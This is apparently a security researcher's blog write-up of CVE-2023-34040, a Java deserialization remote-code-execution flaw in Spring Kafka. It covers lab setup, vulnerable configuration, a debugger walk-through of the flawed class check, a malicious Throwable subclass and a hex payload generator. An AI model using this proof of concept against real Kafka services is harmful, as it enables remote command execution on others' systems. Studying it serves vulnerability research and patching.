CVE-2023-34040 Spring Kafka Deserialization Remote Code Execution
=================================================================
BY PYN3RD
2023-09-15 (Updated: 2023-09-18)
##### 0x01 Preface
Here is the description of the Spring Kafka deserialization vulnerability in the VMware security bulletin.

Reference
[https://spring.io/security/cve-2023-34040](https://spring.io/security/cve-2023-34040)
According to the description in the security bulletin, the vulnerability hinges on a few critical points:
1. The `ErrorHandlingDeserializer` is **not** configured for the key and/or value of the Kafka record.
2. The boolean container properties `checkDeserExWhenKeyNull` and/or `checkDeserExWhenValueNull` are explicitly set to **true**.
3. Users can publish to a Kafka topic without any verification.
##### 0x02 Concepts of Kafka
Before diving deeply into the vulnerability, let us quickly review some relevant concepts of the Kafka service.

* Producer: the object that publishes records is called the **Kafka topic producer**.
* Topic: records are classified by the Kafka service, and each classification is named a **Topic**.
* Broker: the published messages are stored in a group of servers called a Kafka cluster. Each server in the cluster is a **Broker**. A consumer can fetch data from a **Broker** and consume more than one topic.
* Consumer: the object that subscribes to and handles published messages is called the **Kafka topic consumer**. Messages are consumed on a per-topic basis.
Moreover, it is necessary to review the structure of a Kafka record.

A Kafka record, also called a **Message** or **Event**, consists of a **Header** and a **Body**. The header data is essentially **Metadata**: basic elements such as Topic, Partition, and Timestamp, stored as key/value pairs. The body usually holds the relevant business data, also stored as a key/value structure.
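To make the structure concrete, here is a minimal sketch (the topic, key, value, and header names are arbitrary) of building a record whose body is a key/value pair and attaching one header entry:
```
import java.nio.charset.StandardCharsets;
import org.apache.kafka.clients.producer.ProducerRecord;

public class RecordStructureDemo {
    public static void main(String[] args) {
        // Body: a key/value pair destined for the topic "my-topic".
        ProducerRecord<String, String> record =
                new ProducerRecord<>("my-topic", "my-key", "my-value");
        // Header: a metadata-style key/value entry stored alongside the body.
        record.headers().add("trace-id", "42".getBytes(StandardCharsets.UTF_8));
        System.out.println(record);
    }
}
```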
##### Preparation
A Zookeeper server is required before deploying the Kafka service.
1. Installing the Zookeeper server with Docker
```
docker run -d --name zookeeper -p 2181:2181 -t zookeeper:latest
```
2. Deploying the Kafka server with Docker
```
docker run -d --name kafka -p 9092:9092 \
-e KAFKA_ZOOKEEPER_CONNECT=192.168.5.102:2181 \
-e KAFKA_ADVERTISED_LISTENERS=PLAINTEXT://192.168.5.102:9092 \
-e KAFKA_LISTENERS=PLAINTEXT://0.0.0.0:9092 \
-e TZ="Asia/Shanghai" \
wurstmeister/kafka:latest
```
3. Importing the affected spring-kafka dependency into the Spring Boot project
Affected versions:
* 2.8.1 to 2.9.10
* 3.0.0 to 3.0.9
```
<dependency>
    <groupId>org.springframework.kafka</groupId>
    <artifactId>spring-kafka</artifactId>
    <version>2.8.11</version>
</dependency>
```
4. Updating the configuration in `application.yaml`
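A minimal sketch of what `application.yaml` may contain, derived from the `@Value` placeholders in the consumer config class below and the Docker setup above (the exact values are assumptions):
```
spring:
  kafka:
    bootstrap-servers: 192.168.5.102:9092
    consumer:
      group-id: my-group-id
```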

5. Classes for demonstration
1)Kafka Producer Class
```
package com.example.SpringKafkaDemo.producer;

import com.example.SpringKafkaDemo.model.KafkaMessage;
import org.apache.kafka.clients.producer.ProducerRecord;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.kafka.core.KafkaTemplate;
import org.springframework.web.bind.annotation.*;

import java.util.HashMap;

@RestController
public class KafkaProducer {

    @Autowired
    private KafkaTemplate<String, String> kafkaTemplate;

    @PostMapping("/message/send")
    public String sendMessage(@RequestBody KafkaMessage message) {
        String topic = message.getTopic();
        String data = message.getData();
        HashMap<String, String> headers = message.getHeaders();
        ProducerRecord<String, String> producerRecord = new ProducerRecord<>(topic, data);
        for (String s : headers.keySet()) {
            // The special header is supplied as a hex string and forwarded
            // as raw bytes, i.e. a serialized Java object.
            if (s.equals("springDeserializerExceptionKey")) {
                String exceptData = headers.get(s);
                byte[] exceptHandler = KafkaProducer.hexStringtoBytes(exceptData);
                producerRecord.headers().add(s, exceptHandler);
                continue;
            }
            producerRecord.headers().add(s, headers.get(s).getBytes());
        }
        kafkaTemplate.send(producerRecord);
        String jsonString = "{\"code\":\"200\", \"status\":\"success\"}";
        return jsonString;
    }

    // Decodes a hex string into the raw bytes of the serialized payload.
    private static byte[] hexStringtoBytes(String hexString) {
        byte[] exceptionMessage = new byte[hexString.length() / 2];
        for (int i = 0; i < exceptionMessage.length; i++) {
            exceptionMessage[i] = (byte) Integer.parseInt(hexString.substring(i * 2, i * 2 + 2), 16);
        }
        return exceptionMessage;
    }
}
```
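With this controller, a message can be published over HTTP, for example as follows (the port and the field names are assumptions based on the `KafkaMessage` getters):
```
curl -X POST http://localhost:8080/message/send \
-H "Content-Type: application/json" \
-d '{"topic": "my-topic", "data": "hello", "headers": {"myHeader": "test"}}'
```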
By the way, here we use a classic Java design pattern, the Template Method pattern; in this demonstration, I inject a template named `kafkaTemplate`.
The highlighted code fragment:
```
private KafkaTemplate<String, String> kafkaTemplate;
```
2)Kafka Consumer Class
```
package com.example.SpringKafkaDemo.consumer;

import org.springframework.kafka.annotation.KafkaListener;
import org.springframework.stereotype.Service;

@Service
public class KafkaConsumer {

    @KafkaListener(topics = "my-topic", groupId = "my-group-id")
    public void consume(String message) {
        System.out.println("Received message: " + message);
    }
}
```
3)Config Class for the Consumer
```
package com.example.SpringKafkaDemo.config;

import org.apache.kafka.clients.consumer.ConsumerConfig;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.kafka.annotation.EnableKafka;
import org.springframework.kafka.config.ConcurrentKafkaListenerContainerFactory;
import org.springframework.kafka.core.ConsumerFactory;
import org.springframework.kafka.core.DefaultKafkaConsumerFactory;
import org.springframework.kafka.support.serializer.JsonDeserializer;

import java.util.HashMap;
import java.util.Map;

@Configuration
@EnableKafka
public class KafkaConsumerConfig {

    @Value("${spring.kafka.bootstrap-servers}")
    private String bootstrapServers;

    @Value("${spring.kafka.consumer.group-id}")
    private String groupId;

    @Bean
    public Map<String, Object> consumerConfigs() {
        Map<String, Object> props = new HashMap<>();
        props.put(ConsumerConfig.BOOTSTRAP_SERVERS_CONFIG, bootstrapServers);
        props.put(ConsumerConfig.GROUP_ID_CONFIG, groupId);
        props.put(ConsumerConfig.AUTO_OFFSET_RESET_CONFIG, "earliest");
        props.put(ConsumerConfig.KEY_DESERIALIZER_CLASS_CONFIG, JsonDeserializer.class);
        props.put(ConsumerConfig.VALUE_DESERIALIZER_CLASS_CONFIG, JsonDeserializer.class);
        return props;
    }

    @Bean
    public ConsumerFactory<String, String> consumerFactory() {
        return new DefaultKafkaConsumerFactory<>(consumerConfigs());
    }

    @Bean
    public ConcurrentKafkaListenerContainerFactory<String, String> kafkaListenerContainerFactory() {
        ConcurrentKafkaListenerContainerFactory<String, String> factory = new ConcurrentKafkaListenerContainerFactory<>();
        factory.setConsumerFactory(consumerFactory());
        factory.getContainerProperties().setCheckDeserExWhenKeyNull(true);
        factory.getContainerProperties().setCheckDeserExWhenValueNull(true);
        return factory;
    }
}
```
In accordance with the vulnerability description in the official bulletin, we set both the `checkDeserExWhenKeyNull` and `checkDeserExWhenValueNull` properties to **true**.
```
factory.getContainerProperties().setCheckDeserExWhenKeyNull(true);
factory.getContainerProperties().setCheckDeserExWhenValueNull(true);
```
Set a breakpoint at the `getExceptionFromHeader` function and then start the server.

Step into the `invokeIfHaveRecords` function, where the record object will be deserialized.


Back to the `getExceptionFromHeader` function.

This function extracts the header named `springDeserializerExceptionKey` from `record.headers()` (the name is held in the `headerName` variable) and stores it in `header`.
The header's value is then passed to the `byteArrayToDeserializationException` function.

Step into the `byteArrayToDeserializationException` function.

The `resolveClass` function is overridden to restrict arbitrary Java class deserialization. This mitigation against Java deserialization vulnerabilities can be found in many projects, such as Apache Shiro and Fastjson.

Apparently, only the class
`org.springframework.kafka.support.serializer.DeserializationException` can be deserialized. Strictly speaking, though, only the first class read from the stream is validated; nested objects, such as the exception's `cause`, are resolved without any check.
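For reference, the pre-fix logic looks roughly like this (a simplified paraphrase of the affected versions, not an exact copy):
```
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectStreamClass;
import org.springframework.kafka.support.serializer.DeserializationException;

public class PreFixCheckSketch {
    static DeserializationException byteArrayToDeserializationException(byte[] data)
            throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data)) {
            private boolean first = true;

            @Override
            protected Class<?> resolveClass(ObjectStreamClass desc)
                    throws IOException, ClassNotFoundException {
                // Only the first class in the stream is validated; nested
                // objects, such as the cause, are resolved unchecked.
                if (this.first && !desc.getName().equals(DeserializationException.class.getName())) {
                    throw new IOException("Header does not contain a DeserializationException");
                }
                this.first = false;
                return super.resolveClass(desc);
            }
        };
        return (DeserializationException) ois.readObject();
    }
}
```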

Step into the `DeserializationException` constructor; it takes four arguments. One of them is `cause`, which carries a `Throwable` instance that will be reconstructed during deserialization.

Write a malicious class that extends the parent class `Throwable`.
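A minimal sketch of such a class (the class name and the command are placeholders; as in the original demonstration, the class must be available on the consumer's classpath):
```
import java.io.IOException;
import java.io.ObjectInputStream;

// Hypothetical PoC class: it extends Throwable so it can be smuggled in as
// the DeserializationException's cause, and it executes a command when the
// consumer deserializes it.
public class EvilThrowable extends Throwable {

    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        in.defaultReadObject();
        Runtime.getRuntime().exec("open -a Calculator"); // placeholder command
    }
}
```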

Eventually, fill the value of the `springDeserializerExceptionKey` key in the JSON data with the hex-encoded Java serialized payload. Remote code execution is triggered after the HTTP request is sent.
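Putting it together, the hex-encoded payload can be generated roughly like this (a sketch reusing the hypothetical `EvilThrowable` above and the four-argument `DeserializationException` constructor):
```
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import org.springframework.kafka.support.serializer.DeserializationException;

public class PayloadGenerator {
    public static void main(String[] args) throws Exception {
        // Smuggle the malicious Throwable in as the exception's cause.
        DeserializationException ex =
                new DeserializationException("poc", new byte[0], false, new EvilThrowable());
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(ex);
        }
        // Hex-encode so the producer's hexStringtoBytes() can decode it.
        StringBuilder hex = new StringBuilder();
        for (byte b : bos.toByteArray()) {
            hex.append(String.format("%02x", b));
        }
        System.out.println(hex);
    }
}
```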
